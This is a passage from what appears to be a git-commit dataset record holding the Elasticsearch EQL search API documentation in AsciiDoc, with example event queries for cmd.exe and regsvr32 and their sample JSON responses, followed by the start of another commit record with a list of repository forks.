`open`.\n\ninclude::{es-repo-dir}\/rest-api\/common-parms.asciidoc[tag=index-ignore-unavailable]\n\n[[eql-search-api-request-body]]\n==== {api-request-body-title}\n\n`case_sensitive`::\n(Optional, boolean)\nIf `true`, matching for the <<eql-search-api-request-query-param,EQL query>> is\ncase sensitive. Defaults to `false`.\n\n`event_category_field`::\n(Required*, string)\nField containing the event classification, such as `process`, `file`, or\n`network`.\n+\nDefaults to `event.category`, as defined in the {ecs-ref}\/ecs-event.html[Elastic\nCommon Schema (ECS)]. If an index does not contain the `event.category` field,\nthis value is required.\n\n`filter`::\n(Optional, <<query-dsl,query DSL object>>)\nQuery, written in query DSL, used to filter the events on which the EQL query\nruns.\n\n`implicit_join_key_field`::\n(Optional, string)\nReserved for future use.\n\n[[eql-search-api-request-query-param]]\n`query`::\n(Required, string)\n<<eql-syntax,EQL>> query you wish to run.\n+\nIMPORTANT: This parameter supports a subset of EQL syntax. 
See\n<<eql-unsupported-syntax>>.\n\n`search_after`::\n(Optional, string)\nReserved for future use.\n\n`size`::\n(Optional, integer or float)\nMaximum number of matching events to return. Defaults to `50`. Values must be\ngreater than `0`.\n\n[[eql-search-api-timestamp-field]]\n`timestamp_field`::\n+\n--\n(Required*, string)\nField containing event timestamp.\n\nDefaults to `@timestamp`, as defined in the\n{ecs-ref}\/ecs-event.html[Elastic Common Schema (ECS)]. If an index does not\ncontain the `@timestamp` field, this value is required.\n\nEvents in the API response are sorted by this field's value, converted to\nmilliseconds since the https:\/\/en.wikipedia.org\/wiki\/Unix_time[Unix epoch], in\nascending order.\n--\n\n[role=\"child_attributes\"]\n[[eql-search-api-response-body]]\n==== {api-response-body-title}\n\n`took`::\n+\n--\n(integer)\nMilliseconds it took {es} to execute the request.\n\nThis value is calculated by measuring the time elapsed\nbetween receipt of a request on the coordinating node\nand the time at which the coordinating node is ready to send the response.\n\nTook time includes:\n\n* Communication time between the coordinating node and data nodes\n* Time the request spends in the `search` <<modules-threadpool,thread pool>>,\n queued for execution\n* Actual execution time\n\nTook time does *not* include:\n\n* Time needed to send the request to {es}\n* Time needed to serialize the JSON response\n* Time needed to send the response to a client\n--\n\n`timed_out`::\n(boolean)\nIf `true`, the request timed out before completion.\n\n`hits`::\n(object)\nContains matching events and sequences. Also contains related metadata.\n+\n.Properties of `hits`\n[%collapsible%open]\n====\n\n`total`::\n(object)\nMetadata about the number of matching events or sequences.\n+\n.Properties of `total`\n[%collapsible%open]\n=====\n\n`value`::\n(integer)\nFor <<eql-basic-syntax,basic queries>>, the total number of matching events.\n+\nFor <<eql-sequences,sequence queries>>, the total number of matching sequences.\n\n`relation`::\n+\n--\n(string)\nIndicates whether the number of events or sequences returned is accurate or a\nlower bound.\n\nReturned values are:\n\n`eq`::: Accurate\n`gte`::: Lower bound, including returned events or sequences\n--\n=====\n\n`sequences`::\n(array of objects)\nContains event sequences matching the query. Each object represents a\nmatching sequence. This parameter is only returned for EQL queries containing\na <<eql-sequences,sequence>>.\n+\n.Properties of `sequences` objects\n[%collapsible%open]\n=====\n`join_keys`::\n(array of strings)\nShared field values used to constrain matches in the sequence. These are defined\nusing the <<eql-sequences,`by` keyword>> in the EQL query syntax.\n\n`events`::\n(array of objects)\nContains events matching the query. Each object represents a\nmatching event.\n+\n.Properties of `events` objects\n[%collapsible%open]\n======\n`_index`::\n(string)\nName of the index containing the event.\n\n`_id`::\n(string)\nUnique identifier for the event.\nThis ID is only unique within the index.\n\n`_score`::\n(float)\nPositive 32-bit floating point number used to determine the relevance of the\n event.
See <<relevance-scores>>.\n\n`_source`::\n(object)\nOriginal JSON body passed for the event at index time.\n\n`sort`::\n(array)\nInteger used as the sort value for the event.\n+\nBy default, this is the event's <<eql-search-api-timestamp-field,timestamp\nvalue>>, converted to milliseconds since the\nhttps:\/\/en.wikipedia.org\/wiki\/Unix_time[Unix epoch].\n======\n=====\n\n[[eql-search-api-response-events]]\n`events`::\n(array of objects)\nContains events matching the query. Each object represents a\nmatching event.\n+\n.Properties of `events` objects\n[%collapsible%open]\n=====\n`_index`::\n(string)\nName of the index containing the event.\n\n`_id`::\n(string)\nUnique identifier for the event.\nThis ID is only unique within the index.\n\n`_score`::\n(float)\nPositive 32-bit floating point number used to determine the relevance of the\n event. See <<relevance-scores>>.\n\n`_source`::\n(object)\nOriginal JSON body passed for the event at index time.\n\n`sort`::\n(array)\nInteger used as the sort value for the event.\n+\nBy default, this is the event's <<eql-search-api-timestamp-field,timestamp\nvalue>>, converted to milliseconds since the\nhttps:\/\/en.wikipedia.org\/wiki\/Unix_time[Unix epoch].\n=====\n====\n\n[[eql-search-api-example]]\n==== {api-examples-title}\n\n[[eql-search-api-basic-query-ex]]\n===== Basic query example\n\nThe following EQL search request searches for events with an `event.category` of\n`file` that meet the following conditions:\n\n* A `file.name` of `cmd.exe`\n* An `agent.id` other than `my_user`\n\n[source,console]\n----\nGET \/my_index\/_eql\/search\n{\n \"query\": \"\"\"\n file where (file.name == \"cmd.exe\" and agent.id != \"my_user\")\n \"\"\"\n}\n----\n\nThe API returns the following response. Matching events in the `hits.events`\nproperty are sorted by <<eql-search-api-timestamp-field,timestamp>>, converted\nto milliseconds since the https:\/\/en.wikipedia.org\/wiki\/Unix_time[Unix epoch],\nin ascending order.\n\n[source,console-result]\n----\n{\n \"took\": 6,\n \"timed_out\": false,\n \"hits\": {\n \"total\": {\n \"value\": 2,\n \"relation\": \"eq\"\n },\n \"events\": [\n {\n \"_index\": \"my_index\",\n \"_id\": \"2\",\n \"_score\": null,\n \"_source\": {\n \"@timestamp\": \"2020-12-06T11:04:07.000Z\",\n \"agent\": {\n \"id\": \"8a4f500d\"\n },\n \"event\": {\n \"category\": \"file\"\n },\n \"file\": {\n \"accessed\": \"2020-12-07T11:07:08.000Z\",\n \"name\": \"cmd.exe\",\n \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n \"type\": \"file\",\n \"size\": 16384\n },\n \"process\": {\n \"name\": \"cmd.exe\",\n \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\"\n }\n },\n \"sort\": [\n 1607252647000\n ]\n },\n {\n \"_index\": \"my_index\",\n \"_id\": \"4\",\n \"_score\": null,\n \"_source\": {\n \"@timestamp\": \"2020-12-07T11:07:08.000Z\",\n \"agent\": {\n \"id\": \"8a4f500d\"\n },\n \"event\": {\n \"category\": \"file\"\n },\n \"file\": {\n \"accessed\": \"2020-12-07T11:07:08.000Z\",\n \"name\": \"cmd.exe\",\n \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n \"type\": \"file\",\n \"size\": 16384\n },\n \"process\": {\n \"name\": \"cmd.exe\",\n \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\"\n }\n },\n \"sort\": [\n 1607339228000\n ]\n }\n ]\n }\n}\n----\n\/\/ TESTRESPONSE[s\/\"took\": 6\/\"took\": $body.took\/]\n\n[[eql-search-api-sequence-ex]]\n===== Sequence query example\n\nThe following EQL search request matches a <<eql-sequences,sequence>> of events\nthat:\n\n. 
Start with an event with:\n+\n--\n* An `event.category` of `file`\n* A `file.name` of `cmd.exe`\n* An `agent.id` other than `my_user`\n--\n. Followed by an event with:\n+\n--\n* An `event.category` of `process`\n* A `process.path` that contains the substring `regsvr32`\n--\n\nThese events must also share the same `agent.id` value.\n\n[source,console]\n----\nGET \/my_index\/_eql\/search\n{\n \"query\": \"\"\"\n sequence by agent.id\n [ file where file.name == \"cmd.exe\" and agent.id != \"my_user\" ]\n [ process where stringContains(process.path, \"regsvr32\") ]\n \"\"\"\n}\n----\n\nThe API returns the following response. The `hits.sequences.join_keys` property\ncontains the shared `agent.id` value for each matching event. Matching events in\nthe `hits.sequences.events` property are sorted by\n<<eql-search-api-timestamp-field,timestamp>>, converted to milliseconds since\nthe https:\/\/en.wikipedia.org\/wiki\/Unix_time[Unix epoch], in ascending order.\n\n[source,console-result]\n----\n{\n \"took\": 6,\n \"timed_out\": false,\n \"hits\": {\n \"total\": {\n \"value\": 1,\n \"relation\": \"eq\"\n },\n \"sequences\": [\n {\n \"join_keys\": [\n \"8a4f500d\"\n ],\n \"events\": [\n {\n \"_index\": \"my_index\",\n \"_id\": \"4\",\n \"_score\": null,\n \"_source\": {\n \"@timestamp\": \"2020-12-07T11:07:08.000Z\",\n \"agent\": {\n \"id\": \"8a4f500d\"\n },\n \"event\": {\n \"category\": \"file\"\n },\n \"file\": {\n \"accessed\": \"2020-12-07T11:07:08.000Z\",\n \"name\": \"cmd.exe\",\n \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n \"type\": \"file\",\n \"size\": 16384\n },\n \"process\": {\n \"name\": \"cmd.exe\",\n \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\"\n }\n },\n \"fields\": {\n \"@timestamp\": [\n \"1607339228000\"\n ]\n },\n \"sort\": [\n 1607339228000\n ]\n },\n {\n \"_index\": \"my_index\",\n \"_id\": \"5\",\n \"_score\": null,\n \"_source\": {\n \"@timestamp\": \"2020-12-07T11:07:09.000Z\",\n \"agent\": {\n \"id\": \"8a4f500d\"\n },\n \"event\": {\n \"category\": \"process\"\n },\n \"process\": {\n \"name\": \"regsvr32.exe\",\n \"path\": \"C:\\\\Windows\\\\System32\\\\regsvr32.exe\"\n }\n },\n \"fields\": {\n \"@timestamp\": [\n \"1607339229000\"\n ]\n },\n \"sort\": [\n 1607339229000\n ]\n }\n ]\n }\n ]\n }\n}\n----\n\/\/ TESTRESPONSE[s\/\"took\": 6\/\"took\": $body.took\/]\n","old_contents":"[role=\"xpack\"]\n[testenv=\"basic\"]\n\n[[eql-search-api]]\n=== EQL search API\n++++\n<titleabbrev>EQL search<\/titleabbrev>\n++++\n\nexperimental::[]\n\nReturns search results for an <<eql,Event Query Language (EQL)>> query.\n\nIn {es}, EQL assumes each document in an index corresponds to an event.\n\n\/\/\/\/\n[source,console]\n----\nPUT \/my_index\/_bulk?refresh\n{\"index\":{\"_index\" : \"my_index\", \"_id\" : \"1\"}}\n{ \"@timestamp\": \"2020-12-06T11:04:05.000Z\", \"agent\": { \"id\": \"8a4f500d\" }, \"event\": { \"category\": \"process\" }, \"process\": { \"name\": \"cmd.exe\", \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\" } }\n{\"index\":{\"_index\" : \"my_index\", \"_id\" : \"2\"}}\n{ \"@timestamp\": \"2020-12-06T11:04:07.000Z\", \"agent\": { \"id\": \"8a4f500d\" }, \"event\": { \"category\": \"file\" }, \"file\": { \"accessed\": \"2020-12-07T11:07:08.000Z\", \"name\": \"cmd.exe\", \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"type\": \"file\", \"size\": 16384 }, \"process\": { \"name\": \"cmd.exe\", \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\" } }\n{\"index\":{\"_index\" : \"my_index\", \"_id\" : \"3\"}}\n{ \"@timestamp\": \"2020-12-07T11:06:07.000Z\", 
\"agent\": { \"id\": \"8a4f500d\" }, \"event\": { \"category\": \"process\" }, \"process\": { \"name\": \"cmd.exe\", \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\" } }\n{\"index\":{\"_index\" : \"my_index\", \"_id\" : \"4\"}}\n{ \"@timestamp\": \"2020-12-07T11:07:08.000Z\", \"agent\": { \"id\": \"8a4f500d\" }, \"event\": { \"category\": \"file\" }, \"file\": { \"accessed\": \"2020-12-07T11:07:08.000Z\", \"name\": \"cmd.exe\", \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"type\": \"file\", \"size\": 16384 }, \"process\": { \"name\": \"cmd.exe\", \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\" } }\n{\"index\":{\"_index\" : \"my_index\", \"_id\" : \"5\"}}\n{ \"@timestamp\": \"2020-12-07T11:07:09.000Z\", \"agent\": { \"id\": \"8a4f500d\" }, \"event\": { \"category\": \"process\" }, \"process\": { \"name\": \"regsvr32.exe\", \"path\": \"C:\\\\Windows\\\\System32\\\\regsvr32.exe\" } }\n----\n\/\/ TESTSETUP\n\/\/\/\/\n\n[source,console]\n----\nGET \/my_index\/_eql\/search\n{\n \"query\": \"\"\"\n process where process.name = \"regsvr32.exe\"\n \"\"\"\n}\n----\n\n[[eql-search-api-request]]\n==== {api-request-title}\n\n`GET \/<index>\/_eql\/search`\n\n`POST \/<index>\/_eql\/search`\n\n[[eql-search-api-prereqs]]\n==== {api-prereq-title}\n\nSee <<eql-requirements,EQL requirements>>.\n\n[[eql-search-api-limitations]]\n===== Limitations\n\nSee <<eql-limitations,EQL limitations>>.\n\n[[eql-search-api-path-params]]\n==== {api-path-parms-title}\n\n`<index>`::\n(Required, string)\nComma-separated list of index names or <<indices-aliases,index aliases>> used to\nlimit the request. Accepts wildcard expressions.\n+\nTo search all indices, use `_all` or `*`.\n\n[[eql-search-api-query-params]]\n==== {api-query-parms-title}\n\ninclude::{es-repo-dir}\/rest-api\/common-parms.asciidoc[tag=allow-no-indices]\n+\nDefaults to `false`.\n\ninclude::{es-repo-dir}\/rest-api\/common-parms.asciidoc[tag=expand-wildcards]\n+\nDefaults to `open`.\n\ninclude::{es-repo-dir}\/rest-api\/common-parms.asciidoc[tag=index-ignore-unavailable]\n\n[[eql-search-api-request-body]]\n==== {api-request-body-title}\n\n`case_sensitive`::\n(Optional, boolean)\nIf `true`, matching for the <<eql-search-api-request-query-param,EQL query>> is\ncase sensitive. Defaults to `false`.\n\n`event_category_field`::\n(Required*, string)\nField containing the event classification, such as `process`, `file`, or\n`network`.\n+\nDefaults to `event.category`, as defined in the {ecs-ref}\/ecs-event.html[Elastic\nCommon Schema (ECS)]. If an index does not contain the `event.category` field,\nthis value is required.\n\n`filter`::\n(Optional, <<query-dsl,query DSL object>>)\nQuery, written in query DSL, used to filter the events on which the EQL query\nruns.\n\n`implicit_join_key_field`::\n(Optional, string)\nReserved for future use.\n\n[[eql-search-api-request-query-param]]\n`query`::\n(Required, string)\n<<eql-syntax,EQL>> query you wish to run.\n+\nIMPORTANT: This parameter supports a subset of EQL syntax. See\n<<eql-unsupported-syntax>>.\n\n`search_after`::\n(Optional, string)\nReserved for future use.\n\n`size`::\n(Optional, integer or float)\nMaximum number of matching events to return. Defaults to `50`. Values must be\ngreater than `0`.\n\n[[eql-search-api-timestamp-field]]\n`timestamp_field`::\n+\n--\n(Required*, string)\nField containing event timestamp.\n\nDefaults to `@timestamp`, as defined in the\n{ecs-ref}\/ecs-event.html[Elastic Common Schema (ECS)]. 
If an index does not\ncontain the `@timestamp` field, this value is required.\n\nEvents in the API response are sorted by this field's value, converted to\nmilliseconds since the https:\/\/en.wikipedia.org\/wiki\/Unix_time[Unix epoch], in\nascending order.\n--\n\n[role=\"child_attributes\"]\n[[eql-search-api-response-body]]\n==== {api-response-body-title}\n\n`took`::\n+\n--\n(integer)\nMilliseconds it took {es} to execute the request.\n\nThis value is calculated by measuring the time elapsed\nbetween receipt of a request on the coordinating node\nand the time at which the coordinating node is ready to send the response.\n\nTook time includes:\n\n* Communication time between the coordinating node and data nodes\n* Time the request spends in the `search` <<modules-threadpool,thread pool>>,\n queued for execution\n* Actual execution time\n\nTook time does *not* include:\n\n* Time needed to send the request to {es}\n* Time needed to serialize the JSON response\n* Time needed to send the response to a client\n--\n\n`timed_out`::\n(boolean)\nIf `true`, the request timed out before completion.\n\n`hits`::\n(object)\nContains matching events and metadata.\n+\n.Properties of `hits`\n[%collapsible%open]\n====\n\n`total`::\n(object)\nMetadata about the number of matching events.\n+\n.Properties of `total`\n[%collapsible%open]\n=====\n\n`value`::\n(integer)\nTotal number of matching events.\n\n`relation`::\n+\n--\n(string)\nIndicates whether the number of events returned is accurate or a lower bound.\n\nReturned values are:\n\n`eq`::: Accurate\n`gte`::: Lower bound, including returned events\n--\n=====\n\n`sequences`::\n(array of objects)\nContains event sequences matching the query. Each object represents a\nmatching sequence. This parameter is only returned for EQL queries containing\na <<eql-sequences,sequence>>.\n+\n.Properties of `sequences` objects\n[%collapsible%open]\n=====\n`join_keys`::\n(array of strings)\nShared field values used to constrain matches in the sequence. These are defined\nusing the <<eql-sequences,`by` keyword>> in the EQL query syntax.\n\n`events`::\n(array of objects)\nContains events matching the query. Each object represents a\nmatching event.\n+\n.Properties of `events` objects\n[%collapsible%open]\n======\n`_index`::\n(string)\nName of the index containing the event.\n\n`_id`::\n(string)\nUnique identifier for the event.\nThis ID is only unique within the index.\n\n`_score`::\n(float)\nPositive 32-bit floating point number used to determine the relevance of the\n event. See <<relevance-scores>>.\n\n`_source`::\n(object)\nOriginal JSON body passed for the event at index time.\n\n`sort`::\n(array)\nInteger used as the sort value for the event.\n+\nBy default, this is the event's <<eql-search-api-timestamp-field,timestamp\nvalue>>, converted to milliseconds since the\nhttps:\/\/en.wikipedia.org\/wiki\/Unix_time[Unix epoch].\n======\n=====\n\n[[eql-search-api-response-events]]\n`events`::\n(array of objects)\nContains events matching the query. Each object represents a\nmatching event.\n+\n.Properties of `events` objects\n[%collapsible%open]\n=====\n`_index`::\n(string)\nName of the index containing the event.\n\n`_id`::\n(string)\nUnique identifier for the event.\nThis ID is only unique within the index.\n\n`_score`::\n(float)\nPositive 32-bit floating point number used to determine the relevance of the\n event. 
See <<relevance-scores>>.\n\n`_source`::\n(object)\nOriginal JSON body passed for the event at index time.\n\n`sort`::\n(array)\nInteger used as the sort value for the event.\n+\nBy default, this is the event's <<eql-search-api-timestamp-field,timestamp\nvalue>>, converted to milliseconds since the\nhttps:\/\/en.wikipedia.org\/wiki\/Unix_time[Unix epoch].\n=====\n====\n\n[[eql-search-api-example]]\n==== {api-examples-title}\n\n[[eql-search-api-basic-query-ex]]\n===== Basic query example\n\nThe following EQL search request searches for events with an `event.category` of\n`file` that meet the following conditions:\n\n* A `file.name` of `cmd.exe`\n* An `agent.id` other than `my_user`\n\n[source,console]\n----\nGET \/my_index\/_eql\/search\n{\n \"query\": \"\"\"\n file where (file.name == \"cmd.exe\" and agent.id != \"my_user\")\n \"\"\"\n}\n----\n\nThe API returns the following response. Matching events in the `hits.events`\nproperty are sorted by <<eql-search-api-timestamp-field,timestamp>>, converted\nto milliseconds since the https:\/\/en.wikipedia.org\/wiki\/Unix_time[Unix epoch],\nin ascending order.\n\n[source,console-result]\n----\n{\n \"took\": 6,\n \"timed_out\": false,\n \"hits\": {\n \"total\": {\n \"value\": 2,\n \"relation\": \"eq\"\n },\n \"events\": [\n {\n \"_index\": \"my_index\",\n \"_id\": \"2\",\n \"_score\": null,\n \"_source\": {\n \"@timestamp\": \"2020-12-06T11:04:07.000Z\",\n \"agent\": {\n \"id\": \"8a4f500d\"\n },\n \"event\": {\n \"category\": \"file\"\n },\n \"file\": {\n \"accessed\": \"2020-12-07T11:07:08.000Z\",\n \"name\": \"cmd.exe\",\n \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n \"type\": \"file\",\n \"size\": 16384\n },\n \"process\": {\n \"name\": \"cmd.exe\",\n \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\"\n }\n },\n \"sort\": [\n 1607252647000\n ]\n },\n {\n \"_index\": \"my_index\",\n \"_id\": \"4\",\n \"_score\": null,\n \"_source\": {\n \"@timestamp\": \"2020-12-07T11:07:08.000Z\",\n \"agent\": {\n \"id\": \"8a4f500d\"\n },\n \"event\": {\n \"category\": \"file\"\n },\n \"file\": {\n \"accessed\": \"2020-12-07T11:07:08.000Z\",\n \"name\": \"cmd.exe\",\n \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n \"type\": \"file\",\n \"size\": 16384\n },\n \"process\": {\n \"name\": \"cmd.exe\",\n \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\"\n }\n },\n \"sort\": [\n 1607339228000\n ]\n }\n ]\n }\n}\n----\n\/\/ TESTRESPONSE[s\/\"took\": 6\/\"took\": $body.took\/]\n\n[[eql-search-api-sequence-ex]]\n===== Sequence query example\n\nThe following EQL search request matches a <<eql-sequences,sequence>> of events\nthat:\n\n. Start with an event with:\n+\n--\n* An `event.category` of `file`\n* A `file.name` of `cmd.exe`\n* An `agent.id` other than `my_user`\n--\n. Followed by an event with:\n+\n--\n* An `event.category` of `process`\n* A `process.path` that contains the substring `regsvr32`\n--\n\nThese events must also share the same `agent.id` value.\n\n[source,console]\n----\nGET \/my_index\/_eql\/search\n{\n \"query\": \"\"\"\n sequence by agent.id\n [ file where file.name == \"cmd.exe\" and agent.id != \"my_user\" ]\n [ process where stringContains(process.path, \"regsvr32\") ]\n \"\"\"\n}\n----\n\nThe API returns the following response. The `hits.sequences.join_keys` property\ncontains the shared `agent.id` value for each matching event. 
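Each object in `hits.sequences` pairs those `join_keys` with the ordered `events`\nthat matched. The following abridged sketch (illustrative only, not a complete response;\nthe value is taken from the full response below) shows that shape:\n\n[source,js]\n----\n{\n \"hits\": {\n \"sequences\": [\n {\n \"join_keys\": [ \"8a4f500d\" ],\n \"events\": [ ... ]\n }\n ]\n }\n}\n----\n\/\/ NOTCONSOLE\n\n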
Matching events in\nthe `hits.sequences.events` property are sorted by\n<<eql-search-api-timestamp-field,timestamp>>, converted to milliseconds since\nthe https:\/\/en.wikipedia.org\/wiki\/Unix_time[Unix epoch], in ascending order.\n\n[source,console-result]\n----\n{\n \"took\": 6,\n \"timed_out\": false,\n \"hits\": {\n \"total\": {\n \"value\": 1,\n \"relation\": \"eq\"\n },\n \"sequences\": [\n {\n \"join_keys\": [\n \"8a4f500d\"\n ],\n \"events\": [\n {\n \"_index\": \"my_index\",\n \"_id\": \"4\",\n \"_score\": null,\n \"_source\": {\n \"@timestamp\": \"2020-12-07T11:07:08.000Z\",\n \"agent\": {\n \"id\": \"8a4f500d\"\n },\n \"event\": {\n \"category\": \"file\"\n },\n \"file\": {\n \"accessed\": \"2020-12-07T11:07:08.000Z\",\n \"name\": \"cmd.exe\",\n \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n \"type\": \"file\",\n \"size\": 16384\n },\n \"process\": {\n \"name\": \"cmd.exe\",\n \"path\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\"\n }\n },\n \"fields\": {\n \"@timestamp\": [\n \"1607339228000\"\n ]\n },\n \"sort\": [\n 1607339228000\n ]\n },\n {\n \"_index\": \"my_index\",\n \"_id\": \"5\",\n \"_score\": null,\n \"_source\": {\n \"@timestamp\": \"2020-12-07T11:07:09.000Z\",\n \"agent\": {\n \"id\": \"8a4f500d\"\n },\n \"event\": {\n \"category\": \"process\"\n },\n \"process\": {\n \"name\": \"regsvr32.exe\",\n \"path\": \"C:\\\\Windows\\\\System32\\\\regsvr32.exe\"\n }\n },\n \"fields\": {\n \"@timestamp\": [\n \"1607339229000\"\n ]\n },\n \"sort\": [\n 1607339229000\n ]\n }\n ]\n }\n ]\n }\n}\n----\n\/\/ TESTRESPONSE[s\/\"took\": 6\/\"took\": $body.took\/]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c9b95318b6083fa1ccce14537b2281efe3552e18","subject":"Adding more documentation on scaling threadpools","message":"Adding more documentation on scaling 
threadpools\n","repos":"hafkensite\/elasticsearch,tebriel\/elasticsearch,strapdata\/elassandra5-rc,tebriel\/elasticsearch,slavau\/elasticsearch,GlenRSmith\/elasticsearch,Liziyao\/elasticsearch,lzo\/elasticsearch-1,liweinan0423\/elasticsearch,shreejay\/elasticsearch,C-Bish\/elasticsearch,lightslife\/elasticsearch,jsgao0\/elasticsearch,MjAbuz\/elasticsearch,zkidkid\/elasticsearch,kevinkluge\/elasticsearch,truemped\/elasticsearch,diendt\/elasticsearch,rajanm\/elasticsearch,mortonsykes\/elasticsearch,caengcjd\/elasticsearch,queirozfcom\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,umeshdangat\/elasticsearch,sauravmondallive\/elasticsearch,SergVro\/elasticsearch,Collaborne\/elasticsearch,humandb\/elasticsearch,xpandan\/elasticsearch,Brijeshrpatel9\/elasticsearch,slavau\/elasticsearch,smflorentino\/elasticsearch,PhaedrusTheGreek\/elasticsearch,s1monw\/elasticsearch,elasticdog\/elasticsearch,markllama\/elasticsearch,drewr\/elasticsearch,nezirus\/elasticsearch,apepper\/elasticsearch,MetSystem\/elasticsearch,YosuaMichael\/elasticsearch,djschny\/elasticsearch,rento19962\/elasticsearch,amit-shar\/elasticsearch,iacdingping\/elasticsearch,nknize\/elasticsearch,Fsero\/elasticsearch,wimvds\/elasticsearch,mrorii\/elasticsearch,linglaiyao1314\/elasticsearch,camilojd\/elasticsearch,zkidkid\/elasticsearch,zhiqinghuang\/elasticsearch,AndreKR\/elasticsearch,smflorentino\/elasticsearch,NBSW\/elasticsearch,dylan8902\/elasticsearch,mute\/elasticsearch,wayeast\/elasticsearch,dpursehouse\/elasticsearch,i-am-Nathan\/elasticsearch,caengcjd\/elasticsearch,wimvds\/elasticsearch,pritishppai\/elasticsearch,yuy168\/elasticsearch,jeteve\/elasticsearch,AndreKR\/elasticsearch,Brijeshrpatel9\/elasticsearch,martinstuga\/elasticsearch,naveenhooda2000\/elasticsearch,Charlesdong\/elasticsearch,humandb\/elasticsearch,kalimatas\/elasticsearch,dataduke\/elasticsearch,areek\/elasticsearch,khiraiwa\/elasticsearch,kalburgimanjunath\/elasticsearch,tebriel\/elasticsearch,hydro2k\/elasticsearch,overcome\/elasticsearch,shreejay\/elasticsearch,yynil\/elasticsearch,fekaputra\/elasticsearch,queirozfcom\/elasticsearch,MjAbuz\/elasticsearch,huypx1292\/elasticsearch,likaiwalkman\/elasticsearch,mjason3\/elasticsearch,lzo\/elasticsearch-1,overcome\/elasticsearch,iamjakob\/elasticsearch,zhiqinghuang\/elasticsearch,ZTE-PaaS\/elasticsearch,mjhennig\/elasticsearch,masterweb121\/elasticsearch,MaineC\/elasticsearch,drewr\/elasticsearch,scottsom\/elasticsearch,beiske\/elasticsearch,rhoml\/elasticsearch,Brijeshrpatel9\/elasticsearch,Widen\/elasticsearch,shreejay\/elasticsearch,nazarewk\/elasticsearch,18098924759\/elasticsearch,lmtwga\/elasticsearch,Shepard1212\/elasticsearch,kubum\/elasticsearch,pozhidaevak\/elasticsearch,jpountz\/elasticsearch,tsohil\/elasticsearch,mmaracic\/elasticsearch,ImpressTV\/elasticsearch,KimTaehee\/elasticsearch,geidies\/elasticsearch,vietlq\/elasticsearch,kalburgimanjunath\/elasticsearch,Kakakakakku\/elasticsearch,a2lin\/elasticsearch,fred84\/elasticsearch,fooljohnny\/elasticsearch,mm0\/elasticsearch,Shekharrajak\/elasticsearch,Ansh90\/elasticsearch,kubum\/elasticsearch,queirozfcom\/elasticsearch,lzo\/elasticsearch-1,davidvgalbraith\/elasticsearch,JervyShi\/elasticsearch,luiseduardohdbackup\/elasticsearch,huanzhong\/elasticsearch,diendt\/elasticsearch,acchen97\/elasticsearch,khiraiwa\/elasticsearch,ImpressTV\/elasticsearch,fooljohnny\/elasticsearch,zeroctu\/elasticsearch,Rygbee\/elasticsearch,sreeramjayan\/elasticsearch,Widen\/elasticsearch,martinstuga\/elasticsearch,nezirus\/elasticsearch,ivansun1010\/elasticsearch,hafke
nsite\/elasticsearch,PhaedrusTheGreek\/elasticsearch,jsgao0\/elasticsearch,AndreKR\/elasticsearch,glefloch\/elasticsearch,hirdesh2008\/elasticsearch,kevinkluge\/elasticsearch,Ansh90\/elasticsearch,Kakakakakku\/elasticsearch,nellicus\/elasticsearch,btiernay\/elasticsearch,ckclark\/elasticsearch,clintongormley\/elasticsearch,a2lin\/elasticsearch,TonyChai24\/ESSource,henakamaMSFT\/elasticsearch,apepper\/elasticsearch,chirilo\/elasticsearch,avikurapati\/elasticsearch,btiernay\/elasticsearch,btiernay\/elasticsearch,YosuaMichael\/elasticsearch,Widen\/elasticsearch,sposam\/elasticsearch,Siddartha07\/elasticsearch,wittyameta\/elasticsearch,vroyer\/elasticassandra,markwalkom\/elasticsearch,schonfeld\/elasticsearch,geidies\/elasticsearch,drewr\/elasticsearch,kimimj\/elasticsearch,Kakakakakku\/elasticsearch,MichaelLiZhou\/elasticsearch,jeteve\/elasticsearch,fernandozhu\/elasticsearch,mute\/elasticsearch,ivansun1010\/elasticsearch,dataduke\/elasticsearch,ricardocerq\/elasticsearch,knight1128\/elasticsearch,Liziyao\/elasticsearch,KimTaehee\/elasticsearch,alexshadow007\/elasticsearch,HarishAtGitHub\/elasticsearch,sneivandt\/elasticsearch,alexbrasetvik\/elasticsearch,winstonewert\/elasticsearch,drewr\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,Liziyao\/elasticsearch,wangtuo\/elasticsearch,iamjakob\/elasticsearch,fred84\/elasticsearch,caengcjd\/elasticsearch,iamjakob\/elasticsearch,LeoYao\/elasticsearch,ckclark\/elasticsearch,skearns64\/elasticsearch,fekaputra\/elasticsearch,IanvsPoplicola\/elasticsearch,djschny\/elasticsearch,C-Bish\/elasticsearch,ulkas\/elasticsearch,socialrank\/elasticsearch,MjAbuz\/elasticsearch,Widen\/elasticsearch,socialrank\/elasticsearch,yuy168\/elasticsearch,cnfire\/elasticsearch-1,ZTE-PaaS\/elasticsearch,sauravmondallive\/elasticsearch,fernandozhu\/elasticsearch,ulkas\/elasticsearch,diendt\/elasticsearch,dataduke\/elasticsearch,nazarewk\/elasticsearch,artnowo\/elasticsearch,geidies\/elasticsearch,vietlq\/elasticsearch,markllama\/elasticsearch,luiseduardohdbackup\/elasticsearch,liweinan0423\/elasticsearch,GlenRSmith\/elasticsearch,kingaj\/elasticsearch,javachengwc\/elasticsearch,geidies\/elasticsearch,dylan8902\/elasticsearch,MaineC\/elasticsearch,uschindler\/elasticsearch,sneivandt\/elasticsearch,petabytedata\/elasticsearch,ckclark\/elasticsearch,MjAbuz\/